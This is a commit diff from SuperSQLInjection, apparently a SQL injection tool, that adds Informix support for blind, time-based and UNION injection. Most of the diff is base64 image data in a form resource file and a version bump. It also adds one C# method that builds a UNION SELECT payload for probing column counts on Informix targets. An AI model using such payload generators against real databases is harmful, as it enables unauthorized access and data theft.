update 20190303

新增支持Informix注入(盲注,延时,Union)。
shack2
2019-03-03 22:17:41 +08:00
parent cac99f5095
commit 7058ce7325
11 changed files with 1161 additions and 340 deletions




@@ -137,7 +137,7 @@
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
DQAAAk1TRnQBSQFMAgEBBwEAAagBCQGoAQkBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo DQAAAk1TRnQBSQFMAgEBBwEAAcABCQHAAQkBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@@ -242,8 +242,8 @@
<value> <value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAABO ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACe
GQAAAk1TRnQBSQFMAgEBDwEAATABCgEwAQoBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo GQAAAk1TRnQBSQFMAgEBDwEAAWgBCgFoAQoBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAAUADAAEBAQABCAYAARAYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA AwABQAMAAUADAAEBAQABCAYAARAYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@@ -283,75 +283,76 @@
AQcEAAHzCAAB8xMAAfQBDgG8AfACAAFDAv8BQwIAAfABvAEOAfQBAAH/AYYEZQL0BGUBhgH/BAAB8wYA AQcEAAHzCAAB8xMAAfQBDgG8AfACAAFDAv8BQwIAAfABvAEOAfQBAAH/AYYEZQL0BGUBhgH/BAAB8wYA
AvAB8hQAAQcBDgH0AfABEAEAAkMBAAEQAfAB9AEOAQcDAAHxBGUC9ARlAfEFAAHzBgAB8AHzFQAB/wHr AvAB8hQAAQcBDgH0AfABEAEAAkMBAAEQAfAB9AEOAQcDAAHxBGUC9ARlAfEFAAHzBgAB8AHzFQAB/wHr
AQ4BvAH/AfACkgHwAf8BvAEOAesB/wQAAfMBhgZlAYYB8gYAB/IB8xcAAf8BBwEOARMBkgLwAZIBEwEO AQ4BvAH/AfACkgHwAf8BvAEOAesB/wQAAfMBhgZlAYYB8gYAB/IB8xcAAf8BBwEOARMBkgLwAZIBEwEO
AQcB/wYAAf8BBwGuAoYBrgEHAf8oAAH0Ae8B7AIRAewB7wH0NAAB8QHvAbwB8wL0BP8C9AGTAW8BBw0A AQcB/wYAAf8BBwGuAoYBrgEHAf8oAAH0Ae8B7AIRAewB7wH0QAAB/wH0BAAB7QEOAQ8BDgEAAQ4DAAEO
Af8B9AQAAe0BDgEPAQ4BAAEOAwABDgEAAe0IAAH/AfAB9wHvAbwB8wH/AwAB7wHyAfcBvAf/AZMBbwGU AQAB7RIAAfEB7wG8AfMC9AT/AvQBkwFvAQcMAAHwAg4B7wMAARMB9wHyAfcBvAHwAQcBEQHyAfEB7wET
AW8MAAHwAg4B7wMAARMB9wHyAfcBvAHwAQcBEQHyAfEB7wETCAAB8gHtA64B9wHwAf8CAAHxAfcB8QH3 EgAB7wHyAfcBvAf/AZMBbwGUAW8FAAb/AfIBDgFDARQBDgHzAgABEwH3AewBEQHyAQAB8gH3AZIBBwHv
AfEFAAGTAW8BFgFvAQcFAAb/AfIBDgFDARQBDgHzAgABEwH3AewBEQHyAQAB8gH3AZIBBwHvARMHAAHz ARMCAALsBAAD7AQAAuwBAAHxAfcB8QH3AfEFAAGTAW8BFgFvAQcEAAL/AfEB7wHsAe0B9wHsARECFAEO
Au0BbQIUAW0B7QHzAwAB8QHvAfAB7wHxAwABkwFvARYBbwEaBQAC/wHxAe8B7AHtAfcB7AERAhQBDgH/ Af8CAAETAfcB7AEAAfMB7AHzARUB8gHrAREBEwIAAewB/wTsAf8B7AH/BOwB/wHsAgAB8QHvAfAB7wHx
AgABEwH3AewBAAHzAewB8wEVAfIB6wERARMGAAH0AfcBrgHtARIB7AESARUBEwHxBAAB8QHvAbwB7wHx AwABkwFvARYBbwEaBAAB/wH0AQcB7wHwAfMB8gHwAfcBbQETAQ8BBwMAAhMBFQEAAQ8B7AEPAQABQwHt
AQABkwFvARYBbwEaBQAB/wH0AQcB7wHwAfMB8gHwAfcBbQETAQ8BBwMAAhMBFQEAAQ8B7AEPAQABQwHt AUMBEwIAAewF/wHsAf8B7AX/AewDAAHxAe8BvAHvAfEBAAGTAW8BFgFvARoFAAH/AgcB8AG0AosBtAHw
AUMBEwUAAf8B7wKuAe0BEgHvAd0BBwHrAbwFAAHxAe8BvAEHAbwBbwHjAW8BGgYAAf8CBwHwAbQCiwG0 AQcBbQHvBAAB7ArwAewCAAHsBv8B7Ab/AewEAAHxAe8BvAEHAbwBbwHjAW8BGgYAAfIB7wHxAYoEsgGt
AfABBwFtAe8EAAHsCvAB7AQAAf8BBwOuAe0B6gHvAfAB3QGSAe8GAAHxAQcBbwFFAeMBFgEaBwAB8gHv AfIB7wHyBAAB7QEAAf8FBwG8AgAB7QIAAewB/wHsAf8B7AH/AewB/wHsBf8B7AUAAfEBBwFvAUUB4wEW
AfEBigSyAa0B8gHvAfIEAAHtAQAB/wUHAbwCAAHtAwAB/wG8Au0CrgHtAeoBBwHxAfAC9wH/BgAB8QFG ARoHAAEHAfEBtAGzBbIBtAHxAQcEAAHtAQAB8gH/A/QB/wG8AgAB7QIAAewC/wHsA/8B7Ab/AewGAAHx
AZQBRgG8CAABBwHxAbQBswWyAbQB8QEHBAAB7QEAAfIB/wP0Af8BvAIAAe0DAAHzAfcDtQLtAeoBvAHz AUYBlAFGAbwIAAH3AfQGswGyAbMB9AH3BAAB7QEAAfIB/wP0Af8BvAIAAe0CAAHsAf8B7AP/AewB/wHs
AfIB7wHtAf8GAAEHARwCbwEHAu8BBwHwAf8DAAH3AfQGswGyAbMB9AH3BAAB7QEAAfIB/wP0Af8BvAIA Bf8B7AYAAQcBHAJvAQcC7wEHAfAB/wMAAe8B9AGzAbkGswH0Ae8EAAHtAQAB8gH/A/QB/wG8AgAB7QIA
Ae0DAAHzBrUBbQHwAf8B9AG8AewB/wUAAgcBvAHyAbwCBwK8AgcB/wIAAe8B9AGzAbkGswH0Ae8EAAHt AewC/wLsAv8B7Ab/AewFAAIHAbwB8gG8AgcCvAIHAf8CAAEHAfIBugG5AdsB2gLbAbkBugHyAQcEAAHt
AQAB8gH/A/QB/wG8AgAB7QMAAfMGtQHrAfIC/wHyAewB9AQAAQcCvAEAAf8BvAIHAbwB7wHxAQcB8QIA AQAB8gH/A/QB/wG8AgAB7QIAAewB/wHsA/8B7AH/AewF/wHsBAABBwK8AQAB/wG8AgcBvAHvAfEBBwHx
AQcB8gG6AbkB2wHaAtsBuQG6AfIBBwQAAe0BAAHyAf8D9AH/AbwCAAHtAwAB8wa1AewB7QH3Ae8BvAHs AgAB8wEHAfQBswTbAbMB8wEHAfMEAAHtAQAB8gX3AewC9AHsAgAB7AL/AuwC/wHsBv8B7AMAAQcCvAMA
AfQDAAEHArwDAAHwArwB7wHzAQcB8gHwAgAB8wEHAfQBswTbAbMB8wEHAfMEAAHtAQAB8gX3AewC9AHs AfACvAHvAfMBBwHyAfADAAHxAfAB8wG6AbQCugHzAvEFAAHtAQAB8gHrARMBEQJtAwABkgIAAuwE/wHs
AwAB8wIJAgcDtQH3Ae0C7AFtAfMBAAHxAQcC8AQAAfEB8AHvAfMBAAH/AfAB8QMAAfEB8AHzAboBtAK6 Af8B7AT/AuwBAAHxAQcC8AQAAfEB8AHvAfMBAAH/AfAB8QMAAf8B8QEHAfMB9AH/AfMBvAHxAf8FAAHt
AfMC8QUAAe0BAAHyAesBEwERAm0DAAGSAwAB8wEJAd0CCQG8At0D8wG8AfcB8gEAAbwB8wHwBQAB8gG8 AQAB/wHzAfIB8QLyARABAAHrAf8EAATsAQAB7AEABOwDAAG8AfMB8AUAAfIBvAHxAe8B/wEAAv8FAAHz
AfEB7wH/AQAC/wMAAf8B8QEHAfMB9AH/AfMBvAHxAf8FAAHtAQAB/wHzAfIB8QLyARABAAHrAf8DAAHz AfACBwHwAfMHAAHtBwABEQETAf8TAAHyAfEB8gUAAf8B8QHwAfIBvAH/FAAB9wftARUB/x0AAf8B8wLx
A90FGQHzAvQB8QHyAQAB8gHxAfIFAAH/AfEB8AHyAbwB/wcAAfMB8AIHAfAB8wcAAe0HAAERARMB/wQA Af8kAAH/AbQCAAEHCBIBBxEADv8RAAG1BM8BAAHqCP8B6gQAAQcBcgFPA0kBcgEHBQABBwzrAQcGAAH/
AfMBGQHzBfQB8wLxAfIB8wH/CgAB/wHzAvEB/xQAAfcH7QEVAf8FAAH0AvEE8AHxAfMB9AH/BgAB/wG0 AfQC8wH/BfMB/wHPAQAB/wG0AgABbQH/AvQE8wH/AW0DAAGYAU8BUASYAU8BSQEcBAAB6wwHAesCAAH/
AgABBwgSAQcQ/wESBBUB/wFDASoC/wHvAhUBEhIAAbUEzwEAAeoI/wHqAf8O1AH/AW0F/wEqAfYCIwP/ AZoBTAGaAf8DbwEaBW8B9AHPBQABbQH/AfQF8wH/AW0CAAGYAU8BeAEIAZgClwGYAQgBlwFJARwDAAHs
AW0SAAHPAQAB/wG0AgABbQH/AvQE8wH/AW0B/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AW0B/wPz AbwKDwG8AewBAAH/ARYBlAH0AQAB/wnzAf8GAAHrAf8G8wH/AesBAAEHAU8BeAEIBpcBCAGXAUkBBwIA
Af8BKgH2AcMBegGmAv8BbQIAAuwEAAPsBAAC7AEAAc8FAAFtAf8B9AXzAf8BbQH/AdQC3AEZAvQBGQHc AewB8AoQAfAB7AEAAfQBbwMAAfQJbwH0AbsFbAHsAf8G8wH/AewBAAF4AVYBCAKXAXgBGwGYA5cBCAFP
AdsB2gHTAdQB2wHUAf8BbQH/A/QC/wEqAXoBswHTAaYB/wEHAgAB7AH/BOwB/wHsAf8E7AH/AewHAAHr AXICAAHsAfEBEAIRAv8BEQH/AhEBEAHxAewBAAEaAZMDAAH/BRoBGwMaAf8BiwUZAewB/wbzAf8B7AEA
Af8G8wH/AesB/wHUAhkB9AL/AfQBGQEJA9wBCQHUAf8B6wH/BPQB/wEqAQkB4gGzAdMBpgL/AQAB7AX/ AVACmAGXAXgD/wGYApcCmAFPAgAB7AHxAREBQwH/BkMBEQHxAewBAAH0AUYB/wIAAf8FGgEbAxoB/wGL
AewB/wHsBf8B7AEAAbsFbAHsAf8G8wH/AewB/w7UAf8B6wH/BPQC/wGsAQkB4gGzAdMBpgL/AewG/wHs BRkB7AH/BPMD/wHsAQABTwGYAZcBeAL/AfQC/wGYApcBmAFJAgAB7AHyAREBFQH/AxUB/wIVAREB8gHs
Bv8B7AEAAYsFGQHsAf8G8wH/AewB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AesB/wX0Av8BrAEJ AgACbwH/BwAB/wEaAf8CAAGQBRkB7QH/BPMB/wLtAfABAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFP
AeIBswHTAaYB/wHsAf8B7AH/AewB/wHsAf8B7AX/AewBAAGLBRkB7AH/BPMD/wHsAf8B1ALcARkC9AEZ AgAB7AHzAUMCFQL/BBUBQwHzAewCAAH/AZMBJQH0BQABGgFGASUBkwIAAZAFGQGSBv8BkgEHAgABVgKY
AdwB2wHaAdMB1AHbAdQB/wHrCf8BrAEJAeIBswEmASAB7AL/AewD/wHsBv8B7AEAAZAFGQHtAf8E8wH/ BZcBCAH/AfMCmAFPAgAB7AH0AUMIFAFDAfQB7AQAARsBTAH/BAAB9AEaARYBRgH/AQABswUZAQcG9wHw
Au0B8AH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Ar/AawBCQH/ASYBIAHsAf8B7AP/AewB/wHs AwABmAGXAQgGlwEIAZcBCAFQAZcCAAHtAf8KQwH/Ae0FAAEaAW8B9gIAAf8BGgFMAf8B9AH/AQABswUZ
Bf8B7AEAAZAFGQGSBv8BkgEHAQAB/wHUAhkB9AL/AfQBGQEJA9wBCQHUAf8B7Av/AawBJgHeASUB7AL/ AgkBGQGzBwABCAFWAXgBCAaXAQgBeAFPAQcCAAHtDP8B7QYAARsBTAFGAW8BRgGTAf8EAAG5BBkBCQMZ
AuwC/wHsBv8B7AEAAbMFGQEHBvcB8AIAAf8O1AH/AewJ/wL0Af8BJQEgAf8B7AH/AewD/wHsAf8B7AX/ AbkEAAHPAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYAwAB8AztAfAIAAL/BwABuQMZAgkBGQK5AQkB/wG0
AewBAAGzBRkCCQEZAbMGAAH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Aj/AbUC6gEHA/8B7AL/ AgABzwQAAZgBVgGXBJgBlwFQAZgjAAG5BhkBuQG6AQAEzwG1BQABCAGYBFYBmAEHJAABCQa5AQkCAAH/
AuwC/wHsBv8B7AEAAbkEGQEJAxkBuQQAAc8BAAH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Aj/ AbQXAALwAbwB7wKRAe8BvALwAwAQ/wYAAf8B8AH3Ae8BvAHzAf8DAAESBBUB/wFDASoC/wHvAhUBEgQA
AbUD/wH3AgAC7AT/AewB/wHsBP8C7AEAAbkDGQIJARkCuQEJAf8BtAIAAc8BAAH/AdQCGQH0Av8B9AEZ AbwBBwH3Ae8BswLbAbMC7wEHAbwCAAH/DtQB/wYAAfIB7QOuAfcB8AH/AgABbQX/ASoB9gIjA/8BbQMA
AQkD3AEJAdQB/wHsCP8BtQL/AfcFAATsAQAB7AEABOwDAAG5BhkBuQG6AQAEzwG1AQAB/w7UAf8B7Qj/ AfABuwKzAZABugLbAboBkAKzAbsB8AEAAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wUAAfMC7QFt
AbUB/wH3FAABCQa5AQkCAAH/AbQEABD/Cu0B90gAAvABvAHvApEB7wG8AvAHAAEHAXIBTwNJAXIBBwUA AhQBbQHtAfMCAAFtAf8D8wH/ASoB9gHDAXoBpgL/AW0DAAHwAbQC3AbbAtwBtAHwAQAB/wHUAtwBGQL0
Dv8DAAG8DAABBwIAAbwBBwH3Ae8BswLbAbMC7wEHAbwFAAGYAU8BUASYAU8BSQEcBAABBwzrAQcCAAHz ARkB3AHbAdoB0wHUAdsB1AH/BAAB9AH3Aa4B7QESAewBEgEVARMB8QIAAW0B/wP0Av8BKgF6AbMB0wGm
AQACBwr/AgAB8AG7ArMBkAG6AtsBugGQArMBuwHwAwABmAFPAXgBCAGYApcBmAEIAZcBSQEcAwAB6wwH Af8BBwMAAbwBswHcAtsB3ALbAdwC2wHcAbMBvAEAAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AwAB/wHv
AesFAAP0CP8CAAHwAbQC3AbbAtwBtAHwAgABBwFPAXgBCAaXAQgBlwFJAQcCAAHsAbwKDwG8AewCAAHz Aq4B7QESAe8B3QEHAesBvAIAAesB/wT0Af8BKgEJAeIBswHTAaYC/wEAAbwB7wG0A9sBswK6AbMD2wG0
AQACBwP0B/8CAAG8AbMB3ALbAdwC2wHcAtsB3AGzAbwCAAF4AVYBCAKXAXgBGwGYA5cBCAFPAXICAAHs Ae8BvAH/DtQB/wIAAf8BBwOuAe0B6gHvAfAB3QGSAe8CAAHrAf8E9AL/AawBCQHiAbMB0wGmAv8BBwGz
AfAKEAHwAewFAAP0AesBDgEQAewBEQP/AQABvAHvAbQD2wGzAroBswPbAbQB7wG8AQABUAKYAZcBeAP/ AboB2wHcAbMBvAIAAbwBswHcAdsBugGzAQcB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AQAB/wG8
AZgClwKYAU8CAAHsAfEBEAIRAv8BEQH/AhEBEAHxAewCAAHzAQACBwH0AfABAAHwAfQB7QEAA/8BAAEH Au0CrgHtAeoBBwHxAfAC9wH/AQAB6wH/BfQC/wGsAQkB4gGzAdMBpgH/AbsB2wLcAdsBtAQAAbQB2wLc
AbMBugHbAdwBswG8AgABvAGzAdwB2wG6AbMBBwEAAU8BmAGXAXgC/wH0Av8BmAKXAZgBSQIAAewB8QER AdsBuwH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAAHzAfcDtQLtAeoBvAHzAfIB7wHtAf8BAAHr
AUMB/wZDAREB8QHsBQAC8wHyAQ4B7AHzAbwBAAH0Av8BAAG7AdsC3AHbAbQEAAG0AdsC3AHbAbsBAAFV Cf8BrAEJAeIBswEmASABuwHbA9wBtAG8AvABvAG0A9wB2wG7Af8B1ALcARkC9AEZAdwB2wHaAdMB1AHb
AQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPAgAB7AHyAREBFQH/AxUB/wIVAREB8gHsAgAB8wEAAQcB7wLz AdQB/wEAAfMGtQFtAfAB/wH0AbwB7AH/AQAB7Ar/AawBCQH/ASYBIAG8AbMC2wHcAbMBkgIHAZIBswHc
AQcBEwEOAQ8BAAL0Af8BAAG7AdsD3AG0AbwC8AG8AbQD3AHbAbsBAAFWApgFlwEIAf8B8wKYAU8CAAHs AtsBswG8Af8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAB8wa1AesB8gL/AfIB7AH0AQAB7Av/AawBJgHe
AfMBQwIVAv8EFQFDAfMB7AUAA/MBvAHyAfQB7AEQA/QBAAG8AbMC2wHcAbMBkgIHAZIBswHcAtsBswG8 ASUBAAG8AbQB2wHhAdwBswKQAbMB3AHhAdsBtAG8AQAB/w7UAf8BAAHzBrUB7AHtAfcB7wG8AewB9AEA
AQABmAGXAQgGlwEIAZcBCAFQAZcCAAHsAfQBQwgUAUMB9AHsAgAB8wEAAQcB7wLzAewBDwEOAREB7wP0 AewJ/wL0Af8BJQEgAf8BAAG8AbMBGQPhAtwD4QEZAbMBvAEAAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHb
AgABvAG0AdsB4QHcAbMCkAGzAdwB4QHbAbQBvAIAAQgBVgF4AQgGlwEIAXgBTwEHAgAB7QH/CkMB/wHt AdQB/wEAAfMCCQIHA7UB9wHtAuwBbQHzAQAB7Aj/AbUC6gEHA/8CAAG0AdwB4gLbAuEC2wHiAdwBtAIA
BQAB8gfzA/QCAAG8AbMBGQPhAtwD4QEZAbMBvAMAAZgBVgF4AQgBmAJ4AZgBCAF4AU8BmAMAAe0M/wHt Af8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAfMBCQHdAgkBvALdA/MBvAH3AfIBAAHsCP8BtQP/
AgAB8wEAAQcB7wLyBvMC9AMAAbQB3AHiAtsC4QLbAeIB3AG0BQABmAFWAZcEmAGXAVABmAQAAfAM7QHw AfcEAAG7AbQBswG0AdsC4gHbAbQBswG0AbsCAAH/AdQCGQH0Av8B9AEZAQkD3AEJAdQB/wEAAfMD3QUZ
BQAE8gfzAwABuwG0AbMBtAHbAuIB2wG0AbMBtAG7BgABCAGYBFYBmAEHFQAB8wEADP8FAAK8AbMC2wGz AfMC9AHxAfIBAAHsCP8BtQL/AfcHAAK8AbMC2wGzArwEAAH/DtQB/wEAAfMBGQHzBfQB8wLxAfIB8wH/
ArwmAAG8DAABvAYAAbwCuwG8BgABQgFNAT4HAAE+AwABKAMAAUADAAFAAwABAQEAAQEGAAECFgAD/wEA AQAB7Qj/AbUB/wH3CgABvAK7AbwGABD/AQAB9ALxBPAB8QHzAfQB/wQACu0B9wUAAUIBTQE+BwABPgMA
AfABDwT/AgABwAEDAfABDwL/AgABgAEBAeABBwHgAQcCAAGAAQEBwAEDAe8B9wQAAoEB4AEHAgABAQGA ASgDAAFAAwABQAMAAQEBAAEBBgABAhYAA/8BAAHwAQ8E/wIAAcABAwHwAQ8C/wIAAYABAQHgAQcB4AEH
AoEB7wGHAgABAQGAAoEB7wHDAgABAQGAAoEB4AEBBAABgAEBAeABAQQAAYABAQHgARcEAAGAAQEB7wH3 AgABgAEBAcABAwHvAfcEAAKBAeABBwIAAQEBgAKBAe8BhwIAAQEBgAKBAe8BwwIAAQEBgAKBAeABAQQA
BAABgAEBAe8BxwIAAYABAQHAAQMB7wHPAgABgAEBAeABBwHgAR8CAAHAAQMB8AEPAv8CAAHwAQ8E/wMA AYABAQHgAQEEAAGAAQEB4AEXBAABgAEBAe8B9wQAAYABAQHvAccCAAGAAQEBwAEDAe8BzwIAAYABAQHg
AQEB/wHzAcABAwH8AQcBAAEBAf8B4QHAAQMB/AEDAQcBwQHwAQABwAEDAfgBAwKDAeABAAHAAQMB8AED AQcB4AEfAgABwAEDAfABDwL/AgAB8AEPBP8CAAH/AfMBwAEDAv8BAAEBAf8B4QHAAQMC/wEAAQEB8AEA
AcEBBwHAAQEBwAEDAeABAwHgAQ8BwAEDAcABAwHAAQMB8AEfAcABAwHQARsBgAEBAfgBPwHAAQMB0AEb AcABAwE8AXkBBwHBAeABAAHAAQMBAAEBAoMBwAEBAcABAwEAAQEBwQEHAcABAwHAAQMBAAEBAeABDwHA
AYABAQH4AQEBwAEDAdABGwGAAQEB8AEAAcABAwHQARsBgAEBAeIBAAHAAQMB0AEbAYABAQHHAQABwAED AQMB0AEbAQABAQHwAR8BwAEDAdABGwEAAQEB+AE/AcABAwHQARsBAAEBAfgBAQHAAQMB0AEbAQABAQHw
AdABAwGAAQEBDwEIAeABBwHQAQMBgAEBAR8BBAHgAQcB0AEDAYABAQEfAQMB+AEfAd8BxwGAAQEB/wGD AQABwAEDAdABGwEAAQEB4gEAAcABAwHQAQMBAAEBAccBAAHgAQcB0AEDAQABAQEPAQgB4AEHAdABAwHC
Av8BwAEPAYABDwHMBAABAwL/AQQEAAEDAv8BTAQAAQMBPAF5AXwEAAEDAQABAQH8BAABAQEAAQEHAAEB AYcBHwEEAfgBHwHfAccC/wEfAQMC/wHAAQ8D/wGDBP8BzAEAAv8BgAEBAv8BBAEAAfABDwGAAQEB+AEA
BwABAQcAAQEHAAEBAQABAQUAAQEBAAEDBQABAQEAAT8FAAEBAQABPQMAAQMBAAEBAQABDQMAAQcBwgGH AUwBAAHgAQcBgAEBAYABAAF8AQABwAEDAYABAQEIAQAB/AEAAYABAQGAAQEBOAMAAYABAQGAAQEBOAMA
AQABQQMAAQ8C/wEAAc8DAAEfCP8B4AEHAfABDwGAAQEBwAEAAcABAwHgAQcBgAEBAYABAAGAAQEBwAED AYABAQGAAQEBGAMAAYABAQGAAQEBjwHjAgABgAEBAYABAQGHAcMBAAEBAYABAQGAAQEB4wHBAQABAwGA
AYABAQGAAQABgAEBAYABAQGAAQEBgAEAAYABAQGAAQEBgAEBAYADAAGAAQEBgAEBAYABAAEBAoABAQGA AQEBgAEBAfEBgQEAAT8BgAEBAYABAQH4AQ8BAAE9AcABAwGAAQEB/gF/AQABDQHgAQcE/wEAAUEB8AEP
AQEBgAEAAQMBwAGAAQEBgAEBAYADAAGAAQEBgAEBAYADAAGAAQEBgAEBAYABAAGAAQEBgAEBAYABAQGA BP8BAAHPAv8B4AEHAgAB/AEHAQABAwHAAQMCAAH8AQMBAAEDAYABAQIAAfgBAwEAAQMBgAEBAgAB8AED
AQABgAEBAcABAwGAAQEBgAEAAcABAwHgAQcBgAEBAYABAAHAAQMB8AEPAv8BgAEAAfABDwT/AcABAAH8 AQABAwGAAQECAAHgAQMBAAEBBAABwAEDAgABAQGAAgABgAEBAgABAwHAAgABgAEBBgABgAEBBgABgAEB
AT8L AgABgAEBAgABgAEBAgABgAEBAgABgAEBAgABwAEDAgABgAEBAQABAwHAAQMCAAGAAQEBAAEHAfABDwIA
AYABAQEAAQ8B/AE/AgABgAEPAQABHws=
</value> </value>
</data> </data>
<metadata name="toolStrip_getVers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"> <metadata name="toolStrip_getVers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
@@ -409,7 +410,7 @@ Cache-Control: no-cache,no-store</value>
<value>329, 17</value> <value>329, 17</value>
</metadata> </metadata>
<metadata name="$this.TrayHeight" type="System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"> <metadata name="$this.TrayHeight" type="System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<value>151</value> <value>100</value>
</metadata> </metadata>
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64"> <data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value> <value>


@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值, // 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”: // 方法是按如下所示使用“*”:
// [assembly: AssemblyVersion("1.0.*")] // [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.2019.01.20")] [assembly: AssemblyVersion("1.2019.03.03")]
[assembly: AssemblyFileVersion("1.2019.01.20")] [assembly: AssemblyFileVersion("1.2019.03.03")]

Binary file not shown.



@@ -153,6 +153,7 @@
<Compile Include="payload\Access.cs" /> <Compile Include="payload\Access.cs" />
<Compile Include="payload\Comm.cs" /> <Compile Include="payload\Comm.cs" />
<Compile Include="model\Injection.cs" /> <Compile Include="model\Injection.cs" />
<Compile Include="payload\Informix.cs" />
<Compile Include="payload\SQLite.cs" /> <Compile Include="payload\SQLite.cs" />
<Compile Include="payload\DBPayload.cs" /> <Compile Include="payload\DBPayload.cs" />
<Compile Include="payload\DB2.cs" /> <Compile Include="payload\DB2.cs" />


@@ -14,6 +14,7 @@ namespace SuperSQLInjection.model
Oracle = 4, Oracle = 4,
PostgreSQL=5, PostgreSQL=5,
DB2 = 6, DB2 = 6,
SQLite=7 SQLite=7,
Informix=8
} }
} }


@@ -59,7 +59,15 @@ namespace SuperSQLInjection.payload
sb.Append(" from sysibm.sysdummy1"); sb.Append(" from sysibm.sysdummy1");
return sb.ToString(); return sb.ToString();
} }
public static String unionColumnCountTestByInformix(String unionTempaldate, String fill)
{
StringBuilder sb = new StringBuilder(" 1=2 union all select ");
sb.Append(unionTempaldate.Replace("{data}", fill));
sb.Append(" from sysmaster:sysdual");
return sb.ToString();
}
public static String unionColumnCountTest(int maxColumn, int testIndex, String fill) public static String unionColumnCountTest(int maxColumn, int testIndex, String fill)
{ {
